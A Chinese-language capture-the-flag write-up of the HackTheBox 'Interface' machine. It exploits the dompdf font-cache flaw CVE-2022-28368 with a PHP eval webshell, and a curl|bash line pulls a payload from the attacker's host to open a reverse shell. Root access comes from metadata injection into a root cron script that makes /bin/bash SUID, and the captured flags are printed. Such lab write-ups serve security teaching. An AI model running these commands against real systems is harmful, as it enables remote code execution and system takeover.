admin 管理员组

文章数量: 887007

hackthebox htb interface:CVE

本题考察:CVE-2022-28368

CVE-2022-28368 - 通过远程 CSS 字体缓存安装的 RCE

参考:

.htmlhackthebox-interface信息搜集nmap扫描端口发现开放的22和80PORT STATE SERVICE REASON22/tcp open ssh syn-ac....html

dompdf-rce/exploit

cd /tmp;
git clone 
cd dompdf-rce;
cd /tmp/dompdf-rce/exploit/;
cat  exploit.css
sed -i "s/localhost:9001/10.10.14.53/g"  exploit.css;
cp exploit_font.php exploit_font.php.bak;sed -i "s|\(<?php phpinfo(); ?>\)|<?php eval(\$_POST[2]);|g" exploit_font.php; 
tail exploit_font.php;cd /tmp/dompdf-rce/exploit/;
python -m http.server 80 & 

接下来发post包(win10 x64 cmd下):

注意^< 和 ^>做了转义

-x 是走BurpSuite的http8080代理,不需要走代理可以删除.

curl -v -x http://127.0.0.1:8080 -d  "{\"html\": \"title=^<link rel=stylesheet href='.css'^>\"}"  "/api/html2pdf"

计算md5:

echo -n ".php" | md5sum
ae6cfa0a356a3b98582afa39ee67bf43  -

最后反弹shell:

curl -v -x http://127.0.0.1:8080 -d "2=system('curl+10.10.14.53:30088/ccc.sh|bash');" /vendor/dompdf/dompdf/lib/fonts/exploitfont_normal_ae6cfa0a356a3b98582afa39ee67bf43.php

路径要注意:

/vendor/dompdf/dompdf/lib/fonts/exploitfont_normal_ae6cfa0a356a3b98582afa39ee67bf43.php

接下来提权:

bash-4.4$ grep bash /etc/passwd;
root:x:0:0:root:/root:/bin/bash
dev:x:1000:1000:,,,:/home/dev:/bin/bash
bash-4.4$ 

上传pspy64工具到靶机,运行看一下进程。

发现了一个root权限运行的,访问用户的sh文件,很可疑

2023/05/20 10:41:25 CMD: UID=0     PID=1      | /sbin/init maybe-ubiquity 
2023/05/20 10:42:01 CMD: UID=0     PID=33487  | /bin/bash /usr/local/sbin/cleancache.sh 
2023/05/20 10:42:01 CMD: UID=0     PID=33486  | /bin/sh -c /usr/local/sbin/cleancache.sh 
2023/05/20 10:42:01 CMD: UID=0     PID=33485  | /usr/sbin/CRON -f 
2023/05/20 10:42:01 CMD: UID=0     PID=33490  | /bin/bash /usr/local/sbin/cleancache.sh 
2023/05/20 10:42:01 CMD: UID=0     PID=33489  | /bin/bash /usr/local/sbin/cleancache.sh 
2023/05/20 10:42:01 CMD: UID=0     PID=33488  | /bin/bash /usr/local/sbin/cleancache.sh 
2023/05/20 10:42:01 CMD: UID=0     PID=33491  | 
2023/05/20 10:42:01 CMD: UID=0     PID=33492  | /bin/bash /usr/local/sbin/cleancache.sh 
2023/05/20 10:42:01 CMD: UID=0     PID=33494  | /bin/bash /usr/local/sbin/cleancache.sh 
2023/05/20 10:42:01 CMD: UID=0     PID=33493  | /usr/bin/perl -w /usr/bin/exiftool -s -s -s -Producer /tmp/test_original 
2023/05/20 10:42:01 CMD: UID=0     PID=33497  | /bin/bash /usr/local/sbin/cleancache.sh 
2023/05/20 10:42:01 CMD: UID=0     PID=33496  | /usr/bin/perl -w /usr/bin/exiftool -s -s -s -Producer /tmp/yyxx 
2023/05/20 10:42:01 CMD: UID=0     PID=33495  | /bin/bash /usr/local/sbin/cleancache.sh 

ls -al /usr/local/sbin/cleancache.sh ;cat /usr/local/sbin/cleancache.sh ;#! /bin/bash
cache_directory="/tmp"
for cfile in "$cache_directory"/*; doif [[ -f "$cfile" ]]; thenmeta_producer=$(/usr/bin/exiftool -s -s -s -Producer "$cfile" 2>/dev/null | cut -d " " -f1)if [[ "$meta_producer" -eq "dompdf" ]]; thenecho "Removing $cfile"rm "$cfile"fifidone

cat <<EOF>/tmp/.xxyy.sh
#!/bin/bash
id>/tmp/.iidd123;
chattr +a /tmp/.iidd123;
chmod +s /bin/bash;
EOFchmod +x /tmp/.xxyy.sh;
chattr +a /tmp/.xxyy.sh;touch  /tmp/.yy22;/usr/bin/exiftool -Producer='a[$(/tmp/.xxyy.sh>&2)]+42' /tmp/.yy22;ln -s  /tmp/.yy22  /tmp/yy22;# /usr/bin/exiftool -s -s -s -Producer /tmp/.yy22 # /usr/bin/exiftool -s -s -s -Producer /tmp/.yy22 2>/dev/null | cut -d " " -f1
<pdf:Producer>x[$(touch /tmp/0xdf)]</pdf:Producer>bash-4.4$ /usr/bin/exiftool -s -s -s -Producer /tmp/test_original 
x[$(touch /tmp/0xdf)]
bash-4.4$ 

实际上是if里触发执行的,测试命令如下:

meta_producer=$(echo "a[\$(/tmp/.xxyy.sh>&2)]+4");
echo "$meta_producer";if [[ "$meta_producer" -eq "dompdf" ]]; thenecho "Removing 123123"
fi

最后bash -p:

bash-4.4# cat /root/root.txt 
02246920fd2785965ecf72ecaa22d8f3
bash-4.4# 
bash-4.4# cat /home/dev/user.txt 
f8e3acc434850f1527f6860f4b1222eb
bash-4.4# 

事后:

# id
uid=0(root) gid=0(root) groups=0(root)
# crontab  -l
# Edit this file to introduce tasks to be run by cron.
# 
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
# 
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').# 
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
# 
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
# 
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
# 
# For more information see the manual pages of crontab(5) and cron(8)
# 
# m h  dom mon dow   command
*/2 * * * * /usr/local/sbin/cleancache.sh
*/5 * * * * /root/clean.sh
# # bash
root@interface:/tmp# cat /root/clean.sh 
#! /bin/bash
find /var/www/api/vendor/dompdf/dompdf/lib/fonts/ -type f -cmin -5 -exec rm {} \;
cp /root/font_cache/dompdf_font_family_cache.php.bak /root/font_cache/dompdf_font_family_cache.php
chown www-data /root/font_cache/dompdf_font_family_cache.php
chgrp www-data /root/font_cache/dompdf_font_family_cache.php
mv /root/font_cache/dompdf_font_family_cache.php /var/www/api/vendor/dompdf/dompdf/lib/fonts/dompdf_font_family_cache.php
root@interface:/tmp# root@interface:/tmp# uname -a
Linux interface 4.15.0-202-generic #213-Ubuntu SMP Thu Jan 5 19:19:12 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
root@interface:/tmp# cat /etc/os-release 
NAME="Ubuntu"
VERSION="18.04.6 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04.6 LTS"
VERSION_ID="18.04"
HOME_URL="/"
SUPPORT_URL="/"
BUG_REPORT_URL="/"
PRIVACY_POLICY_URL=""
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic
root@interface:/tmp# free -htotal        used        free      shared  buff/cache   available
Mem:           1.9G        233M        690M         14M        1.0G        1.5G
Swap:          1.0G          0B        1.0G
root@interface:/tmp# root@interface:/var/www/html# cat /var/www/api/vendor/dompdf/dompdf/VERSION;
1.2.0
root@interface:/var/www/html# bash-4.4$ cat /var/www/api/composer.json;
{"require": {"bramus/router": "~1.6","dompdf/dompdf": "1.2.0"}
}bash-4.4$ 

可参考文章:

CTF_challenges/MRCTF2022/tprint at main · Snakinya/CTF_challenges · GitHub

dompdf 0day(RCE)复现 | 郁涛丶's Blog

本文标签: hackthebox htb interfaceCVE